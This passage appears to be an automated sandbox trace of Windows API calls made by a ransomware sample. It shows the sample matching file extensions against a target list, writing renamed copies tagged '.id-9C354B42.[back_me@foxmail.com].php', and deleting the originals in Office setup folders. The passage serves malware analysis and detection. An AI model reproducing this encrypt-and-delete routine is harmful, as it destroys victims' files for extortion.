lpString2=".xml") returned -1 [0040.023] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0040.023] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0040.023] lstrcmpiW (lpString1=".XML", lpString2=".php") returned 1 [0040.219] GetFileSizeEx (in: hFile=0x1bc, lpFileSize=0x322ff1c | out: lpFileSize=0x322ff1c*=2624) returned 1 [0040.236] CloseHandle (hObject=0x1bc) returned 1 [0040.237] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\setup.xml")) returned 0x20 [0040.248] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\setup.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0040.251] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0040.251] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.257] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.257] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\setup.xml.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0040.257] GetLastError () returned 0x0 [0040.257] ReadFile (in: hFile=0x1b4, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0xa40, lpOverlapped=0x0) returned 1 [0040.285] WriteFile (in: hFile=0x1b0, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0xa50, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0xa50, lpOverlapped=0x0) returned 1 [0040.286] ReadFile (in: hFile=0x1b4, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x0, lpOverlapped=0x0) returned 1 [0040.286] WriteFile (in: hFile=0x1b0, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0040.286] SetEndOfFile (hFile=0x1b0) returned 1 [0040.286] CloseHandle (hObject=0x1b0) returned 1 [0040.287] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.287] SetEndOfFile (hFile=0x1b4) returned 1 [0040.288] CloseHandle (hObject=0x1b4) returned 1 [0040.288] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0040.288] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\setup.xml")) returned 1 [0040.288] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML") returned 102 [0040.288] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML") returned 102 [0040.288] lstrlenW (lpString=".doc") returned 4 [0040.288] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.288] lstrlenW (lpString=".docx") returned 5 [0040.288] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0040.288] lstrlenW (lpString=".pdf") returned 4 [0040.289] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.289] lstrlenW (lpString=".xls") returned 4 [0040.289] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.289] lstrlenW (lpString=".xlsx") returned 5 [0040.289] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0040.289] lstrlenW (lpString=".ppt") returned 4 [0040.289] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.289] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML") returned 102 [0040.289] lstrlenW (lpString=".zip") returned 4 [0040.289] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.289] lstrlenW (lpString=".rar") returned 4 [0040.289] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.289] lstrlenW (lpString=".bz2") returned 4 [0040.289] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.289] lstrlenW (lpString=".7z") returned 3 [0040.289] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.289] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML") returned 102 [0040.289] lstrlenW (lpString=".dbf") returned 4 [0040.289] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.289] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML") returned 102 [0040.289] lstrlenW (lpString=".1cd") returned 4 [0040.289] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.289] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML") returned 102 [0040.289] lstrlenW (lpString=".jpg") returned 4 [0040.289] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.289] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML") returned 102 [0040.289] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML") returned 102 [0040.289] lstrlenW (lpString=".doc") returned 4 [0040.289] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.289] lstrlenW (lpString=".docx") returned 5 [0040.289] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0040.289] lstrlenW (lpString=".pdf") returned 4 [0040.289] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.290] lstrlenW (lpString=".xls") returned 4 [0040.290] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.290] lstrlenW (lpString=".xlsx") returned 5 [0040.290] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0040.290] lstrlenW (lpString=".ppt") returned 4 [0040.290] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.290] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML") returned 102 [0040.290] lstrlenW (lpString=".zip") returned 4 [0040.290] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.290] lstrlenW (lpString=".rar") returned 4 [0040.290] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.290] lstrlenW (lpString=".bz2") returned 4 [0040.290] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.290] lstrlenW (lpString=".7z") returned 3 [0040.290] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.290] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML") returned 102 [0040.290] lstrlenW (lpString=".dbf") returned 4 [0040.290] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.290] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML") returned 102 [0040.290] lstrlenW (lpString=".1cd") returned 4 [0040.290] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.290] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML") returned 102 [0040.290] lstrlenW (lpString=".jpg") returned 4 [0040.290] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.290] lstrcmpiW (lpString1=".XML", lpString2=".php") returned 1 [0040.290] lstrlenW (lpString="SETUP.XML") returned 9 [0040.290] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0040.329] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x322ff1c | out: lpFileSize=0x322ff1c*=1852) returned 1 [0040.329] CloseHandle (hObject=0x1b0) returned 1 [0040.329] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\setup.xml")) returned 0x20 [0040.329] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\setup.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0040.329] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0040.329] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.329] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.330] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\setup.xml.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0040.330] GetLastError () returned 0x0 [0040.330] ReadFile (in: hFile=0x1b0, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x73c, lpOverlapped=0x0) returned 1 [0040.332] WriteFile (in: hFile=0x1a0, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0x740, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0x740, lpOverlapped=0x0) returned 1 [0040.333] ReadFile (in: hFile=0x1b0, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x0, lpOverlapped=0x0) returned 1 [0040.333] WriteFile (in: hFile=0x1a0, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0040.333] SetEndOfFile (hFile=0x1a0) returned 1 [0040.333] CloseHandle (hObject=0x1a0) returned 1 [0040.334] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.334] SetEndOfFile (hFile=0x1b0) returned 1 [0040.334] CloseHandle (hObject=0x1b0) returned 1 [0040.334] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0040.335] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\setup.xml")) returned 1 [0040.335] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML") returned 104 [0040.335] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML") returned 104 [0040.335] lstrlenW (lpString=".doc") returned 4 [0040.335] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.335] lstrlenW (lpString=".docx") returned 5 [0040.335] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0040.335] lstrlenW (lpString=".pdf") returned 4 [0040.335] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.335] lstrlenW (lpString=".xls") returned 4 [0040.335] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.335] lstrlenW (lpString=".xlsx") returned 5 [0040.335] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0040.335] lstrlenW (lpString=".ppt") returned 4 [0040.335] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.335] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML") returned 104 [0040.335] lstrlenW (lpString=".zip") returned 4 [0040.335] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.335] lstrlenW (lpString=".rar") returned 4 [0040.335] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.336] lstrlenW (lpString=".bz2") returned 4 [0040.336] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.336] lstrlenW (lpString=".7z") returned 3 [0040.336] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.336] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML") returned 104 [0040.336] lstrlenW (lpString=".dbf") returned 4 [0040.336] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.336] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML") returned 104 [0040.336] lstrlenW (lpString=".1cd") returned 4 [0040.336] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.336] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML") returned 104 [0040.336] lstrlenW (lpString=".jpg") returned 4 [0040.336] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.336] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML") returned 104 [0040.336] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML") returned 104 [0040.336] lstrlenW (lpString=".doc") returned 4 [0040.336] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.336] lstrlenW (lpString=".docx") returned 5 [0040.336] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0040.336] lstrlenW (lpString=".pdf") returned 4 [0040.336] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.336] lstrlenW (lpString=".xls") returned 4 [0040.336] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.336] lstrlenW (lpString=".xlsx") returned 5 [0040.336] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0040.336] lstrlenW (lpString=".ppt") returned 4 [0040.336] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.336] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML") returned 104 [0040.336] lstrlenW (lpString=".zip") returned 4 [0040.336] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.336] lstrlenW (lpString=".rar") returned 4 [0040.336] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.336] lstrlenW (lpString=".bz2") returned 4 [0040.336] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.337] lstrlenW (lpString=".7z") returned 3 [0040.337] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.337] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML") returned 104 [0040.337] lstrlenW (lpString=".dbf") returned 4 [0040.337] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.337] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML") returned 104 [0040.337] lstrlenW (lpString=".1cd") returned 4 [0040.337] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.337] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML") returned 104 [0040.337] lstrlenW (lpString=".jpg") returned 4 [0040.337] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.337] lstrcmpiW (lpString1=".CHM", lpString2=".php") returned -1 [0040.337] lstrlenW (lpString="OCT.CHM") returned 7 [0040.337] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\oct.chm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0040.337] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x322ff1c | out: lpFileSize=0x322ff1c*=71236) returned 1 [0040.337] CloseHandle (hObject=0x1b0) returned 1 [0040.337] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\oct.chm")) returned 0x20 [0040.337] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\oct.chm.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0040.338] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\oct.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0040.338] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.338] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.338] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\oct.chm.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0040.338] GetLastError () returned 0x0 [0040.338] ReadFile (in: hFile=0x1b0, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x11644, lpOverlapped=0x0) returned 1 [0040.341] WriteFile (in: hFile=0x1a0, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0x11650, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0x11650, lpOverlapped=0x0) returned 1 [0040.344] ReadFile (in: hFile=0x1b0, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x0, lpOverlapped=0x0) returned 1 [0040.344] WriteFile (in: hFile=0x1a0, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0xe2, lpOverlapped=0x0) returned 1 [0040.344] SetEndOfFile (hFile=0x1a0) returned 1 [0040.344] CloseHandle (hObject=0x1a0) returned 1 [0040.345] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.345] SetEndOfFile (hFile=0x1b0) returned 1 [0040.346] CloseHandle (hObject=0x1b0) returned 1 [0040.346] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0040.346] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\oct.chm")) returned 1 [0040.347] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM") returned 100 [0040.347] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM") returned 100 [0040.347] lstrlenW (lpString=".doc") returned 4 [0040.347] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0040.347] lstrlenW (lpString=".docx") returned 5 [0040.347] lstrcmpiW (lpString1=".docx", lpString2="T.CHM") returned -1 [0040.347] lstrlenW (lpString=".pdf") returned 4 [0040.347] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0040.347] lstrlenW (lpString=".xls") returned 4 [0040.347] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0040.347] lstrlenW (lpString=".xlsx") returned 5 [0040.347] lstrcmpiW (lpString1=".xlsx", lpString2="T.CHM") returned -1 [0040.347] lstrlenW (lpString=".ppt") returned 4 [0040.347] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0040.347] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM") returned 100 [0040.347] lstrlenW (lpString=".zip") returned 4 [0040.347] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0040.347] lstrlenW (lpString=".rar") returned 4 [0040.347] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0040.347] lstrlenW (lpString=".bz2") returned 4 [0040.347] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0040.347] lstrlenW (lpString=".7z") returned 3 [0040.347] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0040.347] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM") returned 100 [0040.347] lstrlenW (lpString=".dbf") returned 4 [0040.347] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0040.347] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM") returned 100 [0040.348] lstrlenW (lpString=".1cd") returned 4 [0040.348] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0040.348] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM") returned 100 [0040.348] lstrlenW (lpString=".jpg") returned 4 [0040.348] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0040.348] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM") returned 100 [0040.348] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM") returned 100 [0040.348] lstrlenW (lpString=".doc") returned 4 [0040.348] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0040.348] lstrlenW (lpString=".docx") returned 5 [0040.348] lstrcmpiW (lpString1=".docx", lpString2="T.CHM") returned -1 [0040.348] lstrlenW (lpString=".pdf") returned 4 [0040.348] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0040.348] lstrlenW (lpString=".xls") returned 4 [0040.348] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0040.348] lstrlenW (lpString=".xlsx") returned 5 [0040.348] lstrcmpiW (lpString1=".xlsx", lpString2="T.CHM") returned -1 [0040.348] lstrlenW (lpString=".ppt") returned 4 [0040.348] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0040.348] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM") returned 100 [0040.348] lstrlenW (lpString=".zip") returned 4 [0040.348] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0040.348] lstrlenW (lpString=".rar") returned 4 [0040.348] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0040.348] lstrlenW (lpString=".bz2") returned 4 [0040.348] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0040.348] lstrlenW (lpString=".7z") returned 3 [0040.348] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 